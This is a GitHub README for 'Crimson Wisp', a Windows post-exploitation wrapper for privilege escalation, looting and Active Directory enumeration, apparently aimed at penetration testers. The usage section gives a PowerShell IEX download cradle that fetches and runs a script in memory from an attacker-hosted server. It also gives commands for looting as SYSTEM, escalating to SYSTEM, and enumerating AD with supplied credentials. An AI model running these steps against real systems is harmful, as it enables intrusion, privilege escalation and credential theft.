Skip to content

Karmaz95/crimson_wisp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Crimson Wisp

Crimson Wisp is a tool that automates post-exploitation PRIVILEGE ESCALATION & LOOTING phases. It uses many open source tools. Most of them are available for download from GitHub.

Installation

git clone https://github.com/Karmaz95/crimson_wisp.git

FIRST UPDATE THE TOOL

chmod +x update.sh
./update.sh

Usage

ON THE HOST MACHINE

  • GO TO crimson_wisp DIRECTORY AND START THE WEB SERVER
cd crimson_wisp
sudo python3 -m http.server 80

ON THE TARGET MACHINE

  • LOAD THE SCRIPT TO MEMMORY
IEX(new-object system.net.webclient).downloadstring("http://<your_server>/wisp.txt")
  • SET A SERVER URL FOR THE DOWNLOADERS & LOAD THE SCRIPTS
Invoke-Wisp -Url http://<your_server>
. memory_load
  • PRIVILEGE ESCALATION ENUMERATION
. escalation
  • LOOTING THE SYSTEM - USE AS nt authority/system ONLY!
. looting
  • LOCAL ADMIN TO SYSTEM
. get_system
  • AD ENUM - AS THE CURRENT USER
. ad_enumerator -domain domain.com -asme
  • AD ENUM - AS THE DIFFERENT USER
. ad_enumerator -domain domain.com -user 'DOMAIN\karmaz95' -pass 'enumeration10!'

HISTORY

If you are curious about how it works, read my blog:

List of utilized tools

The following tools are used in Crimson Wisp. I encourage you to study the links below. They will help you in your work.

LICENSE

This program is free software: you can redistribute it and/or modify it under the terms of the Apache License. Crimson Lisp and any contributions are Copyright © by Karol Mazurek 2022.

SUPPORT

You can support the project by buying me a coffee or via NFT which unlock the secret Crimson Web community.

Buy Me A Coffee

About

Windows Post-Exploitation tools wrapper

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published